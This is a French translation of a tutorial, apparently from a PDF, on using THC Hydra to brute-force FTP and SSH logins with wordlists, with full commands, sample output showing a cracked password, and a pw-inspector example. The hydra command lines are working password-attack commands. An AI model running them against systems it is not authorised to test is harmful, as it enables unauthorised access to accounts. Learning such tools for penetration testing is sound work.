Vous êtes sur la page 1sur 3

Crackez les mots de passe ftp avec l’hydra

18 février 2014

Mot de passe brutal


Hydra est un outil de piratage de mot de passe populaire qui peut être utilisé
pour forcer de nombreux services à découvrir le mot de passe de connexion à
partir d’une liste de mots donnée. Il est inclus dans kali linux et figure dans la
liste des 10 meilleurs. Sur Ubuntu, il peut être installé à partir du gestionnaire
de paquets synaptic.
Pour forcer brutalement, hydra a besoin d’une liste de mots de passe. Il
existe de nombreuses listes de mots de passe disponibles. Dans cet exemple,
nous allons utiliser la liste de mots de passe par défaut fournie avec john the
ripper, qui est un autre outil de recherche de mots de passe. Une autre liste de
mots de passe est disponible sur dazzlepod.
John est pré-installé sur Kali linux et sa liste de mots de passe est disponible
à l’emplacement suivant
/usr/share/john/password.lst
Ça ressemble à ça

# !comment : This list has been compiled by Solar Designer of Openwall Project,
# !comment : http ://www.openwall.com/wordlists/
# !comment :
# !comment : This list is based on passwords most commonly seen on a set of Unix
# !comment : systems in mid-1990’s, sorted for decreasing number of occurrences
# !comment : (that is, more common passwords are listed first). It has been
# !comment : revised to also include common website passwords from public lists
# !comment : of "top N passwords" from major community website compromises that
# !comment : occurred in 2006 through 2010.
# !comment :
# !comment : Last update : 2011/11/20 (3546 entries)
123456
12345
password
password1
123456789
12345678
1234567890

Créez une copie de ce fichier sur votre bureau ou à n’importe quel emplace-
ment et supprimez les lignes de commentaire (toutes les lignes situées au-dessus

1
du mot de passe 123456). Notre liste de mots de mots de passe est prête et nous
allons l’utiliser pour forcer un serveur FTP à essayer de déchiffrer son mot de
passe.
Voici la commande simple avec sortie

root@kali : # hydra -t 1 -l admin -P /root/Desktop/password.lst -vV 192.168.1.1 ftp


Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http ://www.thc.org/thc-hydra) starting at 2013-05-13 04 :32 :18
[DATA] 1 task, 1 server, 3546 login tries (l :1/p :3546), 3546 tries per task
[DATA] attacking service ftp on port 21
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "123456" - 1 of 3546 [child 0]
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "12345" - 2 of 3546 [child 0]
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "password" - 3 of 3546 [child 0]
[21][ftp] host : 192.168.1.1 login : admin password : password
[STATUS] attack finished for 192.168.1.1 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (http ://www.thc.org/thc-hydra) finished at 2013-05-13 04 :32 :33
root@kali : #

Vérifiez la ligne « [21] [ftp] ». Il mentionne la combinaison nom d’utilisa-


teur/mot de passe qui a fonctionné pour le serveur FTP. Assez facile ! Voyons
maintenant les options. L’option t indique combien de threads parallèles doivent
être créés par hydra. Dans ce cas, j’ai utilisé 1 car de nombreux routeurs ne
peuvent pas gérer plusieurs connexions et gèlent ou se bloquent brièvement.
Pour éviter cela, il est préférable de faire une tentative à la fois. L’option sui-
vante est "l" qui indique le nom d’utilisateur ou le nom de connexion à utiliser.
Dans ce cas, son administrateur. Vient ensuite l’option "P" majuscule qui four-
nit la liste de mots à utiliser. Hydra récupère chaque ligne sous la forme d’un
mot de passe unique et l’utilise.
L’option "v" est réservée à la discussion et la principale "V" à l’affichage de
tous les mots de passe essayés. Enfin vient l’adresse IP/hôte suivie par le service
à craquer.
Le forçage brutal est la forme la plus élémentaire de techniques de cracking
de mots de passe. Il fonctionne bien avec des périphériques tels que les routeurs,
etc., qui sont généralement configurés avec leurs mots de passe par défaut. Ce-
pendant, s’agissant d’autres systèmes, le forçage brutal ne fonctionnera pas si
vous n’êtes pas trop chanceux.
https ://www.binarytides.com/crack-ftp-passwords-with-thc-hydra-tutorial/

2
Exemple d’utilisation d’hydra
Essayez de vous connecter en tant qu’utilisateur root (-l root) à l’aide d’une liste de mots de passe
( -P /usr/share/wordlists/metasploit/unix_passwords.txt) avec 6 threads (-t 6) sur le
serveur SSH donné (ssh : // 192.168.1.123) :
root @ kali : # hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 6 ssh :
//192.168.1.123
Hydra v7.6 (c) 2013 de van Hauser / THC & David Maciejak - à des fins légales uniquement
Hydra (http ://www.thc.org/thc-hydra) à partir du 2014-05-19 07 :53 :33
[DATA] 6 tâches, 1 serveur, 1003 tentatives de connexion (l : 1 / p : 1003), 167 tentatives par
tâche
[DATA] attaque le service ssh sur le port 22

Exemple d’utilisation de pw-inspector


Lire une liste de mots de passe ( -i /usr/share/wordlists/nmap.lst) et l’enregistrer dans un
fichier ( -o /root/passes.txt) en sélectionnant des mots de passe d’une longueur minimale de 6 (
-m 6) et une longueur maximale de 10 ( -M 10) :
root @ kali : # pw-inspector -i /usr/share/wordlists/nmap.lst -o /root/passes.txt -m 6 -M 10
root @ kali : # wc -l /usr/share/wordlists/nmap.lst
5086 /usr/share/wordlists/nmap.lst
root @ kali : # wc -l /root/passes.txt
4490 /root/passes.txt

Vous aimerez peut-être aussi